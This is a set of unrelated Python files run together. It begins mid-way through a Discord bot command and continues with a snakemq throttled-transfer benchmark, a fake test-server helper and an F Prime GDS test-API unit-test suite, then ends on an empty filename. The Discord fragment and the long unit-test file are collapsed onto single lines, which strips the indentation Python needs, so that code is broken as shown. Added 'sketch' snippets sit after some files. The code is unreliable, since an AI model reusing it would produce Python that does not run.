text()['status'] embed = discord.Embed(title='Creator Code info', description=None) embed.add_field(name=code, value=f'``{code}``', inline=True) embed.add_field(name=account, value=f'``{codeAcc}``', inline=True) embed.add_field(name=account_id, value=f'``{codeAccID}``') if codestatus == 'ACTIVE': embed.add_field(name=status, value=f'``{active}``', inline=True) else: embed.add_field(name=status, value=f'``{inactive}``', inline=True) if codeverified == True: embed.add_field(name=verified_bool, value=f'``{yes}``') else: embed.add_field(name=verified_bool, value=f'``{no}``') await ctx.send(embed=embed) elif response.status_code == 400: error = geted['error'] embed = discord.Embed(title='Error', description=f'``{error}``') await ctx.send(embed=embed) elif response.status_code == 404: error = geted['error'] embed = discord.Embed(title='Error', description=f'``{error}``') await ctx.send(embed=embed) @bot.event async def on_command_error(ctx, error): if isinstance(error, commands.CommandNotFound): await ctx.send(text()['command_not_found_error']) else: raise error try: bot.run(T) except Exception as e: print(e) exit()
packeter_single_large_throttled.py
#!/usr/bin/env python
"""
Send a single large packet over a single connection.

@author: David Siroky (siroky@dasir.cz)
@license: MIT License (see LICENSE.txt or
          U{http://www.opensource.org/licenses/mit-license.php})
"""

import time
import logging
import sys
from multiprocessing import Process

sys.path.insert(0, "../..")

import snakemq
import snakemq.link
import snakemq.packeter
import snakemq.throttle

###########################################################################

DATA_SIZE = 1 * 1024 * 1024
PORT = 4000

###########################################################################

def srv():
    s = snakemq.link.Link()
    container = {"start_time": None}

    def on_connect(conn_id):
        container["start_time"] = time.time()

    def on_packet_recv(conn_id, packet):
        assert len(packet) == DATA_SIZE
        diff = time.time() - container["start_time"]
        print("flow: %.02f MBps" % (DATA_SIZE / diff / 1024**2))

    def on_disconnect(conn_id):
        s.stop()

    s.add_listener(("", PORT))
    tr = snakemq.packeter.Packeter(s)
    tr.on_connect = on_connect
    tr.on_packet_recv = on_packet_recv
    tr.on_disconnect = on_disconnect
    s.loop()
    s.cleanup()

###########################################################################

def cli():
    s = snakemq.link.Link()

    def on_connect(conn_id):
        tr.send_packet(conn_id, b"x" * DATA_SIZE)

    def on_packet_sent(conn_id, packet_id):
        s.stop()

    s.add_connector(("localhost", PORT))
    throttle = snakemq.throttle.Throttle(s, 100000)
    tr = snakemq.packeter.Packeter(throttle)
    tr.on_connect = on_connect
    tr.on_packet_sent = on_packet_sent
    s.loop()
    s.cleanup()

###########################################################################

# avoid logging overhead
logger = logging.getLogger("snakemq")
logger.setLevel(logging.ERROR)

thr_srv = Process(target=srv)
thr_srv.start()

thr_cli = Process(target=cli)
thr_cli.start()

thr_srv.join()
thr_cli.join()
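# Design note (sketch, not from the original example): the client builds its
# Packeter on top of snakemq.throttle.Throttle rather than on the raw Link, so
# the outgoing 1 MiB payload is rate-limited to roughly 100 kB/s. A rough lower
# bound on the transfer time the server should report is therefore:
expected_seconds = DATA_SIZE / 100000.0   # ~10.5 s for a 1 MiB payload
print("expected minimum transfer time: %.1f s" % expected_seconds)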
fake_server_manager.py
__author__ = 'dev'

import threading


class FakeServerManager:
    def __init__(self, server_class, request_handler_class, server_port, **kwargs):
        self.server = server_class(('', server_port), request_handler_class, kwargs)

    def start_server(self):
        threading.Thread(target=self.server.serve_forever).start()

    def stop_server(self):
        self.server.shutdown()
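# Usage sketch (hypothetical, not from the original file): FakeServerManager
# forwards its **kwargs to server_class as a plain dict in the third positional
# argument, so the server class must accept that extra parameter.
# ExtraArgsHTTPServer below is an illustrative adapter around http.server.HTTPServer;
# the handler, port, and "greeting" keyword are made up for the example.
import http.server


class ExtraArgsHTTPServer(http.server.HTTPServer):
    def __init__(self, addr, handler_class, extra_args=None):
        self.extra_args = extra_args or {}
        super().__init__(addr, handler_class)


class PingHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"pong")


manager = FakeServerManager(ExtraArgsHTTPServer, PingHandler, 8000, greeting="pong")
manager.start_server()            # serve_forever() runs on a background thread
# ... exercise the fake server, e.g. GET http://localhost:8000/ ...
manager.stop_server()             # shutdown() unblocks serve_forever()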
api_unit_test.py
import math import os import sys import threading import time import unittest filename = os.path.dirname(__file__) gdsName = os.path.join(filename, "../../../../src") fprimeName = os.path.join(filename, "../../../../../Fw/Python/src") sys.path.insert(0, gdsName) sys.path.insert(0, fprimeName) from fprime_gds.common.testing_fw import predicates from fprime_gds.common.history.test import TestHistory from fprime_gds.common.testing_fw.api import IntegrationTestAPI from fprime_gds.common.pipeline.standard import StandardPipeline from fprime_gds.common.utils.config_manager import ConfigManager # these imports are needed to generate data objects. from fprime.common.models.serialize.i32_type import I32Type from fprime.common.models.serialize.u32_type import U32Type from fprime.common.models.serialize.string_type import StringType from fprime.common.models.serialize.time_type import TimeType from fprime_gds.common.data_types.ch_data import ChData from fprime_gds.common.data_types.cmd_data import CmdData from fprime_gds.common.data_types.event_data import EventData class UTPipeline(StandardPipeline): """ This pipeline shares many of the same calls available in pipeline.standard. It is used by this testcase to feed simulated data to the test api. """ def __init__(self): self.command_count = 0 self.t0 = TimeType() StandardPipeline.__init__(self) def connect(self, address, port): pass def disconnect(self): pass def send_command(self, command, args): command_template = self.command_id_dict[command] cmd_data = CmdData(tuple(args), command_template) self.command_hist.data_callback(cmd_data) for hist in self.command_subscribers: hist.data_callback(cmd_data) ev_temp = self.event_name_dict["CommandReceived"] event = EventData((U32Type(cmd_data.get_id()),), self.t0 + time.time(), ev_temp) self.enqueue_event(event) ev_temp = self.event_name_dict["HistorySizeUpdate"] evr_size = U32Type(len(self.event_hist.retrieve())) cmd_size = U32Type(len(self.command_hist.retrieve())) ch_size = U32Type(len(self.channel_hist.retrieve())) event = EventData((evr_size, cmd_size, ch_size), self.t0 + time.time(), ev_temp) self.enqueue_event(event) self.command_count += 1 ch_temp = self.channel_name_dict["CommandCounter"] update = ChData(U32Type(self.command_count), self.t0 + time.time(), ch_temp) self.enqueue_telemetry(update) def enqueue_event(self, event): """ Used by the unit test to feed simulated data objects into the pipeline """ self.event_decoder.send_to_all(event) def enqueue_telemetry(self, channel): """ Used by the unit test to feed simulated data objects into the pipeline """ self.channel_decoder.send_to_all(channel) class APITestCases(unittest.TestCase): @classmethod def setUpClass(cls): cls.pipeline = UTPipeline() config = ConfigManager() filename = os.path.dirname(__file__) path = os.path.join(filename, "./UnitTestDictionary.xml") cls.pipeline.setup(config, path) log_path = os.path.join(filename, "./logs") cls.api = IntegrationTestAPI(cls.pipeline, log_path) cls.case_list = [] # TODO find a better way to do this. 
cls.threads = [] def setUp(self): for t in self.threads: if t.isAlive(): t.join() self.threads.clear() count = len(self.case_list) self.api.start_test_case(self._testMethodName, count) self.case_list.append(1) self.tHistory = TestHistory() self.t0 = TimeType() @classmethod def tearDownClass(cls): cls.pipeline.disconnect() cls.api.teardown() ###################################################################################### # Test Case Helper Methods ###################################################################################### def fill_history(self, callback, items, timestep=0): for item in items: if timestep: time.sleep(timestep) if isinstance(item, ChData) or isinstance(item, EventData): if item.time == 0: item.time = self.t0 + time.time() callback(item) def fill_history_async(self, callback, items, timestep=1): t = threading.Thread(target=self.fill_history, args=(callback, items, timestep)) self.threads.append(t) t.start() return t def assert_lists_equal(self, expected, actual): assert len(expected) == len( actual ), "the given list should have had the length {}, but instead had {}\nExpected {}\nActual{}".format( len(expected), len(actual), expected, actual ) for i in range(len(expected)): assert ( expected[i] == actual[i] ), "the {} element of the expected list should be {}, but was {}.".format( i, expected[i], actual[i] ) def get_counter_sequence(self, length): seq = [] for i in range(0, length): ch_temp = self.pipeline.get_channel_name_dictionary()["Counter"] seq.append(ChData(U32Type(i), TimeType(), ch_temp)) return seq def get_oscillator_sequence(self, length): seq = [] for i in range(0, length): ch_temp = self.pipeline.get_channel_name_dictionary()["Oscillator"] val = int(round(10*math.sin(math.radians(i)))) seq.append(ChData(I32Type(val), TimeType(), ch_temp)) return seq def get_severity_event(self, severity="DIAGNOSTIC"): name = "Severity" + severity temp = self.pipeline.get_event_name_dictionary()[name] event = EventData(tuple(), TimeType(), temp) return event def get_severity_sequence(self, length, severity="DIAGNOSTIC"): seq = [] for i in range(0, length): seq.append(self.get_severity_event(severity)) return seq class AssertionFailure(Exception): """ Used to differentiate an AssertionError in test cases that intentionally raise an assertion error. """ pass ###################################################################################### # Test Cases ###################################################################################### def test_dummy_pipeline(self): length = 15 event_list = self.get_severity_sequence(length) t1 = self.fill_history_async(self.pipeline.enqueue_event, event_list, 0.1) print("waiting for queue to fill") pred = predicates.greater_than_or_equal_to(length // 2) results = self.api.await_event_count(pred) assert pred(len(results)), "the correct amount of objects was received" t1.join() evr_hist = self.api.get_event_test_history() item_count = len(evr_hist) assert ( item_count == length ), "Were the correct number of items in the history? 
({},{})".format( item_count, length ) def test_find_history_item(self): self.fill_history(self.tHistory.data_callback, range(0, 50)) self.fill_history(self.tHistory.data_callback, range(0, 50)) pred = predicates.equal_to(25) result = self.api.find_history_item(pred, self.tHistory) assert result == 25, "The search should have returned 25, but found {}".format( result ) result = self.api.find_history_item(pred, self.tHistory, start=50) assert result == 25, "The search should have returned 25, but found {}".format( result ) result = self.api.find_history_item(pred, self.tHistory, start=80) assert ( result is None ), "The search should have returned None, but found {}".format(result) def test_find_history_item_timeout(self): pred = predicates.equal_to(25) listA = range(0, 50) self.fill_history_async(self.tHistory.data_callback, listA, 0.01) result = self.api.find_history_item(pred, self.tHistory, timeout=1) assert result == 25, "The search should have returned 25, but found {}".format( result ) pred = predicates.equal_to(49) result = self.api.find_history_item(pred, self.tHistory, timeout=1) assert result == 49, "The search should have returned 49, but found {}".format( result ) self.tHistory.clear() listA = range(0, 50) pred = predicates.equal_to(49) self.fill_history_async(self.tHistory.data_callback, listA, 0.1) result = self.api.find_history_item(pred, self.tHistory, timeout=1) assert ( result is None ), "The search should have returned None, but found {}".format(result) def test_find_history_sequence(self): sequence = [] for i in range(30, 40, 2): sequence.append(predicates.equal_to(i)) self.fill_history(self.tHistory.data_callback, range(0, 50)) results = self.api.find_history_sequence(sequence, self.tHistory) assert ( len(results) == len(sequence) ), "The search should have found {}, but returned {}".format(range(30, 40, 2), results) self.assert_lists_equal(range(30, 40, 2), results) results = self.api.find_history_sequence(sequence, self.tHistory, start=34) assert ( len(results) != len(sequence) ), "The search should have returned an incomplete list, but found {}".format(results) self.fill_history(self.tHistory.data_callback, range(0, 50)) results = self.api.find_history_sequence(sequence, self.tHistory, start=34) assert ( len(results) == len(sequence) ), "The search should have found {}, but returned {}".format(range(30, 40, 2), results) self.assert_lists_equal(range(30, 40, 2), results) results = self.api.find_history_sequence(sequence, self.tHistory, start=90) assert ( len(results) != len(sequence) ), "The search should have returned an incomplete list, but found {}".format(results) def test_find_history_sequence_timeout(self): sequence = [] for i in range(30, 40, 2): sequence.append(predicates.equal_to(i)) self.fill_history_async(self.tHistory.data_callback, range(0, 50), 0.01) results = self.api.find_history_sequence(sequence, self.tHistory, timeout=1) assert results is not None, "The search should have found a sequence" self.assert_lists_equal(range(30, 40, 2), results) self.fill_history_async(self.tHistory.data_callback, range(0, 50), 0.01) results = self.api.find_history_sequence( sequence, self.tHistory, start=34, timeout=1 ) assert results is not None, "The search should have found a sequence" self.assert_lists_equal(range(30, 40, 2), results) self.tHistory.clear() self.fill_history_async(self.tHistory.data_callback, range(25, 50), 0.1) results = self.api.find_history_sequence( sequence, self.tHistory, start=90, timeout=1 ) assert ( len(results) != len(sequence) ), "The 
search should have returned an incomplete list, but found {}".format(results) def test_find_history_count(self): count_pred = predicates.greater_than_or_equal_to(10) search_pred = predicates.greater_than_or_equal_to(40) self.fill_history(self.tHistory.data_callback, range(0, 50)) results = self.api.find_history_count(count_pred, self.tHistory) self.assert_lists_equal(range(0, 50), results) results = self.api.find_history_count(count_pred, self.tHistory, search_pred) self.assert_lists_equal(range(40, 50), results) self.fill_history(self.tHistory.data_callback, range(50, 70)) results = self.api.find_history_count(count_pred, self.tHistory, search_pred) self.assert_lists_equal(range(40, 70), results) results = self.api.find_history_count(count_pred, self.tHistory, start=60) self.assert_lists_equal(range(60, 70), results) def test_find_history_count_timeout(self): count_pred = predicates.greater_than_or_equal_to(10) search_pred = predicates.greater_than_or_equal_to(40) self.fill_history_async(self.tHistory.data_callback, range(0, 50), 0.01) results = self.api.find_history_count(count_pred, self.tHistory) assert ( len(results) < 10 ), "The search should have returned an incomplete list, but found {}".format(results) results = self.api.find_history_count( count_pred, self.tHistory, search_pred, timeout=2 ) self.assert_lists_equal(range(40, 50), results) self.fill_history_async(self.tHistory.data_callback, range(50, 60), 0.01) results = self.api.find_history_count( count_pred, self.tHistory, search_pred, start=50, timeout=2 ) self.assert_lists_equal(range(50, 60), results) self.tHistory.clear() self.fill_history_async(self.tHistory.data_callback, range(35, 60), 0.1) results = self.api.find_history_count( count_pred, self.tHistory, search_pred, timeout=1 ) assert ( len(results) < 10 ), "The search should have returned an incomplete list, but found {}".format(results) def test_get_latest_fsw_time(self): ts0 = self.api.get_latest_time() time.sleep(0.1) ts1 = self.api.get_latest_time() assert ts0 is ts1, "The starting timestamp should not have changed if no dataobjects were enqueued" count_seq = self.get_counter_sequence(100) event_seq = self.get_severity_sequence(100) t1 = self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.02) t2 = self.fill_history_async(self.pipeline.enqueue_event, event_seq, 0.02) last = ts0 for i in range(1, 10): time.sleep(0.1) tsi = self.api.get_latest_time() assert tsi > last, "Iter {}: {} should be greater than {}".format(i, tsi, last) last = tsi t1.join() t2.join() tsn_1 = self.api.get_latest_time() assert tsn_1 > last, "The final timestamp, {}, should be greater than {}.".format(tsn_1, last) time.sleep(0.1) tsn_2 = self.api.get_latest_time() assert tsn_2 == tsn_1, "The timestamp should not have changed, while no data was streaming." 
def test_clear_histories(self): eventHistory = self.api.get_event_test_history() channelHistory = self.api.get_telemetry_test_history() commandHistory = self.api.get_command_test_history() self.api.clear_histories() assert eventHistory.size() == 0, "eventHistory should be empty" assert channelHistory.size() == 0, "channelHistory should be empty" count_seq = self.get_counter_sequence(100) event_seq = self.get_severity_sequence(100) t1 = self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.02) t2 = self.fill_history_async(self.pipeline.enqueue_event, event_seq, 0.02) t1.join() t2.join() sizeE = eventHistory.size() iE = sizeE // 2 firstE = eventHistory[iE] timeE = firstE.get_time() sizeC = channelHistory.size() iC = 0 for i in range(0, channelHistory.size()): if channelHistory[i].get_time() >= timeE: iC = i break firstC = channelHistory[iC] self.api.clear_histories(timeE) msg = "The event history should have been reduced by {} elements".format(iE) assert sizeE - iE == eventHistory.size(), msg msg = "The element with the timestamp should be first in the history" assert firstE is eventHistory[0], msg msg = "The channel history should have been reduced by {} elements".format(iC) assert sizeC - iC == channelHistory.size(), msg msg = "The first element in the history should be the first with a valid time" assert firstC is channelHistory[0], msg args1 = [] self.api.send_command("TEST_CMD_1", args1) assert commandHistory.size() > 0, "history size should be greater than 0" assert channelHistory.size() > 0, "history size should be greater than 0" assert eventHistory.size() > 0, "history size should be greater than 0" self.api.clear_histories() assert commandHistory.size() == 0, "history size should be 0" assert channelHistory.size() == 0, "history size should be 0" assert eventHistory.size() == 0, "history size should be 0" def test_registering_and_removing_subhistories(self): # Verifying that retrieving a subhistory for events behaves as expected event_hist = self.api.get_event_test_history() self.pipeline.enqueue_event(self.get_severity_event()) assert event_hist.size() == 1, "There should be one event in the api's history" event_subhist = self.api.get_event_subhistory() assert event_subhist.size() == 0, "There should be no events in the subhistory" self.pipeline.enqueue_event(self.get_severity_event()) assert event_hist.size() == 2, "There should be two events in the api's history" assert event_subhist.size() == 1, "There should be one event in the subhistory" assert self.api.remove_event_subhistory(event_subhist), "remove should succeed" self.pipeline.enqueue_event(self.get_severity_event()) assert event_hist.size() == 3, "There should be three events in the api's history" assert event_subhist.size() == 1, "There should be one event in the subhistory" self.api.clear_histories() assert event_hist.size() == 0, "There should be no events in the api's history" assert event_subhist.size() == 1, "There should be one event in the subhistory" assert not self.api.remove_event_subhistory(event_subhist), "should not remove twice" # same checks, but for telemetry telem_seq = self.get_counter_sequence(3) telem_hist = self.api.get_telemetry_test_history() self.pipeline.enqueue_telemetry(telem_seq[0]) assert telem_hist.size() == 1, "There should be one update in the api's history" telem_subhist = self.api.get_telemetry_subhistory() assert telem_subhist.size() == 0, "There should be no updates in the subhistory" self.pipeline.enqueue_telemetry(telem_seq[1]) assert telem_hist.size() == 2, "There 
should be two updates in the api's history" assert telem_subhist.size() == 1, "There should be one update in the subhistory" assert self.api.remove_telemetry_subhistory(telem_subhist), "remove should succeed" self.pipeline.enqueue_telemetry(telem_seq[2]) assert telem_hist.size() == 3, "There should be three updates in the api's history" assert telem_subhist.size() == 1, "There should be one update in the subhistory" self.api.clear_histories() assert telem_hist.size() == 0, "There should be no updates in the api's history" assert telem_subhist.size() == 1, "There should be one update in the subhistory" assert not self.api.remove_telemetry_subhistory(telem_subhist), "should not remove twice" def test_translate_command_name(self): assert self.api.translate_command_name("TEST_CMD_1") == 1 assert self.api.translate_command_name("TEST_CMD_2") == 2 assert self.api.translate_command_name("TEST_CMD_3") == 3 assert self.api.translate_command_name(1) == 1 assert self.api.translate_command_name(2) == 2 assert self.api.translate_command_name(3) == 3 try: self.api.translate_command_name("DOES_NOT_EXIST") assert False, "the api should have raised a KeyError" except KeyError: assert True, "the api raised the correct error" try: self.api.translate_command_name(0) assert False, "the api should have raised a KeyError" except KeyError: assert True, "the api raised the correct error" def test_send_command(self): args1 = [] self.api.send_command("TEST_CMD_1", args1) self.api.send_command(1, args1) args2 = ["0x01", "0x02"] self.api.send_command("TEST_CMD_2", args2) self.api.send_command(2, args2) args3 = ["test message for the test command"] self.api.send_command("TEST_CMD_3", args3) self.api.send_command(3, args3) hist = self.api.get_command_test_history() assert hist.size() == 6 for cmd in hist: print(cmd) def test_send_and_await_telemetry(self): result = self.api.send_and_await_telemetry("TEST_CMD_1", channels="CommandCounter") assert result is not None, "the search should find the telemetry generated by UTPipeline" self.api.clear_histories() seq = ["CommandCounter"] + ["Counter"] * 5 self.fill_history_async(self.pipeline.enqueue_telemetry, self.get_counter_sequence(10), 0.01) results1 = self.api.send_and_await_telemetry("TEST_CMD_1", channels=seq) assert len(results1) == 6, "Should have gotten 6 results out of the await" self.fill_history_async(self.pipeline.enqueue_telemetry, self.get_counter_sequence(10), 0.01) results2 = self.api.send_and_await_telemetry("TEST_CMD_1", channels=seq) assert len(results2) == 6, "Should have gotten 6 results out of the await" for i in range(0, 6): assert results1[i] != results2[i], "These sequences should be unique items" self.api.clear_histories() seq = ["CommandCounter"] + ["Oscillator"] * 5 self.fill_history_async(self.pipeline.enqueue_telemetry, self.get_oscillator_sequence(10), 0.01) results = self.api.send_and_await_telemetry("TEST_CMD_1", channels=seq) assert len(results) == 6, "Should have gotten 6 results out of the await" def test_send_and_await_event(self): result = self.api.send_and_await_event("TEST_CMD_1", events="CommandReceived") assert result is not None, "the search should have found the CommandReceived Event" self.api.clear_histories() seq = ["CommandReceived"] + ["SeverityDIAGNOSTIC"] * 5 self.fill_history_async(self.pipeline.enqueue_event, self.get_severity_sequence(10), 0.01) results1 = self.api.send_and_await_event("TEST_CMD_1", events=seq) assert len(results1) == 6, "Should have gotten 6 results out of the await" 
self.fill_history_async(self.pipeline.enqueue_event, self.get_severity_sequence(10), 0.01) results2 = self.api.send_and_await_event("TEST_CMD_1", events=seq) assert len(results2) == 6, "Should have gotten 6 results out of the await" for i in range(0, 6): assert results1[i] != results2[i], "These sequences should be unique items" def test_send_and_assert_telemetry(self): self.api.send_and_assert_telemetry("TEST_CMD_1", channels="CommandCounter") self.api.clear_histories() seq = ["CommandCounter"] + ["Counter"] * 5 self.fill_history_async(self.pipeline.enqueue_telemetry, self.get_counter_sequence(10), 0.01) results1 = self.api.send_and_assert_telemetry("TEST_CMD_1", channels=seq, timeout=5) self.fill_history_async(self.pipeline.enqueue_telemetry, self.get_counter_sequence(10), 0.01) results2 = self.api.send_and_assert_telemetry("TEST_CMD_1", channels=seq, timeout=5) for i in range(0, 6): assert results1[i] != results2[i], "These sequences should be unique items" self.api.clear_histories() seq = ["CommandCounter"] + ["Oscillator"] * 5 self.fill_history_async(self.pipeline.enqueue_telemetry, self.get_oscillator_sequence(10), 0.01) self.api.send_and_assert_telemetry("TEST_CMD_1", channels=seq, timeout=5) def test_send_and_assert_event(self): self.api.send_and_assert_event("TEST_CMD_1", events="CommandReceived") self.api.clear_histories() seq = ["CommandReceived"] + ["SeverityDIAGNOSTIC"] * 5 self.fill_history_async(self.pipeline.enqueue_event, self.get_severity_sequence(10), 0.01) results1 = self.api.send_and_assert_event("TEST_CMD_1", events=seq, timeout=5) self.fill_history_async(self.pipeline.enqueue_event, self.get_severity_sequence(10), 0.01) results2 = self.api.send_and_assert_event("TEST_CMD_1", events=seq, timeout=5) for i in range(0, 6): assert results1[i] != results2[i], "These sequences should be unique items" def test_translate_telemetry_name(self): assert self.api.translate_telemetry_name("CommandCounter") == 1 assert self.api.translate_telemetry_name("Oscillator") == 2 assert self.api.translate_telemetry_name("Counter") == 3 assert self.api.translate_telemetry_name(1) == 1 assert self.api.translate_telemetry_name(2) == 2 assert self.api.translate_telemetry_name(3) == 3 try: self.api.translate_command_name("DOES_NOT_EXIST") assert False, "the api should have raised a KeyError" except KeyError: assert True, "the api raised the correct error" try: self.api.translate_command_name(0) assert False, "the api should have raised a KeyError" except KeyError: assert True, "the api raised the correct error" def test_get_telemetry_pred(self): pred = predicates.telemetry_predicate() result = self.api.get_telemetry_pred(pred) assert pred == result, "should return when channel is already telem_pred" update = self.get_counter_sequence(1)[0] pred = self.api.get_telemetry_pred(update.get_id(), update.get_val()) assert pred(update), "predicate should return true when fields are specified" def test_await_telemetry(self): seq = self.get_counter_sequence(20) self.fill_history_async(self.pipeline.enqueue_telemetry, seq[0:10], 0.01) result = self.api.await_telemetry("Counter", 8) assert result is not None, "Await should have found a correct channel update: {}".format(result) time.sleep(1) self.fill_history_async(self.pipeline.enqueue_telemetry, seq[10:20], 0.01) result = self.api.await_telemetry("Counter", 8) assert result is None, "Await should not have found an update: {}".format(result) self.api.clear_histories() self.fill_history_async(self.pipeline.enqueue_telemetry, seq, 0.1) result = 
self.api.await_telemetry("Counter", 15, timeout=1) assert result is None, "Await should not have found an update: {}".format(result) def test_await_telemetry_sequence(self): count_seq = self.get_counter_sequence(20) sin_seq = self.get_oscillator_sequence(100) search_seq = [] for i in range(15, 20): pred = self.api.get_telemetry_pred("Counter", i) search_seq.append(pred) t1 = self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.05) t2 = self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.01) results = self.api.await_telemetry_sequence(search_seq) assert len(results) == len(search_seq), "lists should have the same length" for i in range(0, len(results)): msg = predicates.get_descriptive_string(results[i], search_seq[i]) assert search_seq[i](results[i]), msg t1.join() t2.join() results = self.api.await_telemetry_sequence(search_seq) assert len(results) < len(search_seq), "repeating the search should not complete" self.api.clear_histories() t1 = self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.05) t2 = self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.01) results = self.api.await_telemetry_sequence(search_seq, timeout=1) assert len(results) < len(search_seq), "repeating the search should not complete" t1.join() t2.join() def test_await_telemetry_count(self): count_seq = self.get_counter_sequence(20) sin_seq = self.get_oscillator_sequence(100) pred = predicates.greater_than_or_equal_to(10) search_pred = self.api.get_telemetry_pred("Counter", pred) count_pred = predicates.within_range(10, 20) t1 = self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.05) t2 = self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.01) results = self.api.await_telemetry_count(count_pred, search_pred) msg = predicates.get_descriptive_string(len(results), count_pred) assert count_pred(len(results)), msg t1.join() t2.join() self.api.clear_histories() t1 = self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.05) t2 = self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.01) results = self.api.await_telemetry_count(100) assert len(results) == 100, "await count should have found 100 items" t1.join() t2.join() self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.05) self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.02) results = self.api.await_telemetry_count(100, timeout=1) assert len(results) < 100, "await count should have found fewer 100 items" def test_assert_telemetry(self): seq = self.get_counter_sequence(20) self.fill_history_async(self.pipeline.enqueue_telemetry, seq[0:10], 0.01) self.api.assert_telemetry("Counter", 8, timeout=1) time.sleep(1) self.fill_history_async(self.pipeline.enqueue_telemetry, seq[10:20], 0.01) try: self.api.assert_telemetry("Counter", 8, start="NOW", timeout=1) raise self.AssertionFailure() except AssertionError: assert True, "api raised the correct error" except self.AssertionFailure: assert False, "api failed to raise an assertion error" self.api.clear_histories() self.fill_history_async(self.pipeline.enqueue_telemetry, seq, 0.1) try: self.api.assert_telemetry("Counter", 15, timeout=1) raise self.AssertionFailure() except AssertionError: assert True, "api raised the correct error" except self.AssertionFailure: assert False, "api failed to raise an assertion error" def test_assert_telemetry_sequence(self): count_seq = self.get_counter_sequence(20) sin_seq = self.get_oscillator_sequence(100) search_seq = [] for i in 
range(15, 20): pred = self.api.get_telemetry_pred("Counter", i) search_seq.append(pred) self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.05) self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.01) self.api.assert_telemetry_sequence(search_seq, start="NOW", timeout=5) self.api.assert_telemetry_sequence(search_seq) time.sleep(1) try: self.api.assert_telemetry_sequence(search_seq, start="NOW", timeout=5) raise self.AssertionFailure() except AssertionError: assert True, "api raised the correct error" except self.AssertionFailure: assert False, "api failed to raise an assertion error" self.api.clear_histories() self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.07) self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.01) try: self.api.assert_telemetry_sequence(search_seq, start="NOW", timeout=1) raise self.AssertionFailure() except AssertionError: assert True, "api raised the correct error" except self.AssertionFailure: assert False, "api failed to raise an assertion error" def test_assert_telemetry_count(self): count_seq = self.get_counter_sequence(20) sin_seq = self.get_oscillator_sequence(100) pred = predicates.greater_than_or_equal_to(10) search_pred = self.api.get_telemetry_pred("Counter", pred) count_pred = predicates.within_range(10, 20) self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.05) self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.01) self.api.assert_telemetry_count(count_pred, search_pred, timeout=2) self.api.assert_telemetry_count(count_pred, search_pred) self.api.clear_histories() t1 = self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.05) t2 = self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.01) self.api.assert_telemetry_count(100, timeout=2) t1.join() t2.join() try: self.api.assert_telemetry_count(100) raise self.AssertionFailure() except AssertionError: assert True, "api raised the correct error" except self.AssertionFailure: assert False, "api failed to raise an assertion error" self.api.clear_histories() self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.05) self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.02) try: self.api.assert_telemetry_count(100, timeout=1) raise self.AssertionFailure() except AssertionError: assert True, "api raised the correct error" except self.AssertionFailure: assert False, "api failed to raise an assertion error" def test_translate_event_name(self): assert self.api.translate_event_name("CommandReceived") == 1 assert self.api.translate_event_name("HistorySizeUpdate") == 2 assert self.api.translate_event_name("SeverityCOMMAND") == 3 assert self.api.translate_event_name("SeverityACTIVITY_LO") == 4 assert self.api.translate_event_name("SeverityACTIVITY_HI") == 5 assert self.api.translate_event_name("SeverityWARNING_LO") == 6 assert self.api.translate_event_name("SeverityWARNING_HI") == 7 assert self.api.translate_event_name("SeverityDIAGNOSTIC") == 8 assert self.api.translate_event_name("SeverityFATAL") == 9 for i in range(1, 10): assert self.api.translate_event_name(i) == i try: self.api.translate_event_name("DOES_NOT_EXIST") assert False, "the api should have raised a KeyError" except KeyError: assert True, "the api raised the correct error" try: self.api.translate_event_name(0) assert False, "the api should have raised a KeyError" except KeyError: assert True, "the api raised the correct error" def test_get_event_pred(self): pred = predicates.event_predicate() 
result = self.api.get_event_pred(pred) assert pred == result, "should return when channel is already event_pred" message = self.get_severity_event("FATAL") pred = self.api.get_event_pred(message.get_id(), message.get_args(), message.get_severity()) assert pred(message), "predicate should return true when fields are specified" """ def test_await_event(self): raise NotImplementedError("Test Case is not yet implemented") def test_await_event_sequence(self): raise NotImplementedError("Test Case is not yet implemented") def test_await_event_count(self): raise NotImplementedError("Test Case is not yet implemented") def test_assert_event(self): raise NotImplementedError("Test Case is not yet implemented") def test_assert_event_sequence(self): raise NotImplementedError("Test Case is not yet implemented") def test_assert_event_count(self): raise NotImplementedError("Test Case is not yet implemented") """ if __name__ == "__main__": unittest.main()
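# --- Illustrative sketch (not part of the original test file) ---
# The predicates used in the cases above are plain callables returned by
# factories such as predicates.equal_to() or predicates.within_range(), which
# is why the tests can write `assert pred(value)`.  A minimal, hedged example
# of filtering an arbitrary sequence with one of those factories:
def _predicate_filter_example():
    in_range = predicates.within_range(10, 20)          # callable predicate
    return [value for value in range(0, 50) if in_range(value)]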
threading_server_forever.py
